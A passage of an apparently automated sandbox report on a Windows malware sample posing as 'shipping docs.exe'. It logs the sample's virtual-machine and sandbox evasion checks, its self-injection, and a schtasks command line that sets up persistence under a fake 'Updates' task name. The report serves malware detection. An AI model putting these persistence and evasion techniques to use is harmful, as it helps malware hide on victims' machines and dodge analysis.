                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 4552, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: VMqTMMD.exe PID: 1280, type: MEMORYSTR
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\shipping docs.exe TID: 2292 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\shipping docs.exe TID: 1708 | Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Users\user\Desktop\shipping docs.exe TID: 6088 | Thread sleep count: 9753 > 30
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 5596 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 3956 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 2092 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 4912 | Thread sleep time: -23058430092136925s >= -30000s
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 3324 | Thread sleep count: 9727 > 30
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 908 | Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 1392 | Thread sleep count: 9676 > 30
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\shipping docs.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\shipping docs.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\shipping docs.exe | Window / User API: threadDelayed 9753
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Window / User API: threadDelayed 9727
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Window / User API: threadDelayed 9676
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\shipping docs.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\shipping docs.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Thread delayed: delay time: 922337203685477
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: VMqTMMD.exe, 00000015.00000002.512897668.0000000001029000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllowerManagementCapabilities
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: shipping docs.exe, 00000003.00000002.514223306.0000000001202000.00000004.00000020.00020000.00000000.sdmp, shipping docs.exe, 00000003.00000003.309409191.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.552042956.0000000006640000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\shipping docs.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\shipping docs.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\shipping docs.exe | Code function: 3_2_0684DA38 LdrInitializeThunk,3_2_0684DA38
                Source: C:\Users\user\Desktop\shipping docs.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\shipping docs.exe | Memory written: C:\Users\user\Desktop\shipping docs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Memory written: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Memory written: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\shipping docs.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp"
                Source: C:\Users\user\Desktop\shipping docs.exe | Process created: C:\Users\user\Desktop\shipping docs.exe {path}
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp"
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp"
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Users\user\Desktop\shipping docs.exe VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\shipping docs.exe | Queries volume information (VolumeInformation) for the following files under C:\Windows\Fonts\:
                arial.ttf, ariali.ttf, arialbd.ttf, arialbi.ttf, ARIALN.TTF, ariblk.ttf, ARIALNI.TTF, ARIALNB.TTF, ARIALNBI.TTF, bahnschrift.ttf,
                calibri.ttf, calibril.ttf, calibrii.ttf, calibrili.ttf, calibrib.ttf, calibriz.ttf, cambria.ttc, cambriai.ttf, cambriab.ttf, cambriaz.ttf,
                Candara.ttf, Candarai.ttf, Candarab.ttf, Candaraz.ttf, comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf,
                consola.ttf, consolai.ttf, consolab.ttf, consolaz.ttf, constan.ttf, constani.ttf, constanb.ttf, constanz.ttf,
                corbel.ttf, corbeli.ttf, corbelb.ttf, corbelz.ttf, cour.ttf, couri.ttf, courbd.ttf, courbi.ttf, ebrima.ttf, ebrimabd.ttf,
                framd.ttf, FRADM.TTF, framdit.ttf, FRADMIT.TTF, FRAMDCN.TTF, FRADMCN.TTF, FRAHV.TTF, FRAHVIT.TTF,
                Gabriola.ttf, gadugi.ttf, gadugib.ttf, georgia.ttf, georgiai.ttf, georgiab.ttf, georgiaz.ttf, impact.ttf, Inkfree.ttf, javatext.ttf,
                LeelawUI.ttf, LeelUIsl.ttf, LeelaUIb.ttf, lucon.ttf, l_10646.ttf, malgun.ttf, malgunsl.ttf, malgunbd.ttf, himalaya.ttf,
                msjh.ttc, msjhl.ttc, msjhbd.ttc, ntailu.ttf, ntailub.ttf, phagspa.ttf, phagspab.ttf, micross.ttf, taile.ttf, taileb.ttf,
                msyh.ttc, msyhl.ttc, msyhbd.ttc, msyi.ttf, mingliub.ttc, monbaiti.ttf, msgothic.ttc, mvboli.ttf, mmrtext.ttf, mmrtextb.ttf,
                Nirmala.ttf, NirmalaS.ttf, NirmalaB.ttf, pala.ttf, palai.ttf, palab.ttf, palabi.ttf,
                segoepr.ttf, segoeprb.ttf, segoesc.ttf, segoescb.ttf, segoeuii.ttf, seguisli.ttf, seguili.ttf, seguisbi.ttf, segoeuiz.ttf, seguibl.ttf, seguibli.ttf, seguiemj.ttf, seguihis.ttf, seguisym.ttf,
                simsun.ttc, simsunb.ttf, Sitka.ttc, SitkaI.ttc, SitkaB.ttc, SitkaZ.ttc, sylfaen.ttf, symbol.ttf, tahoma.ttf, tahomabd.ttf, timesi.ttf
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
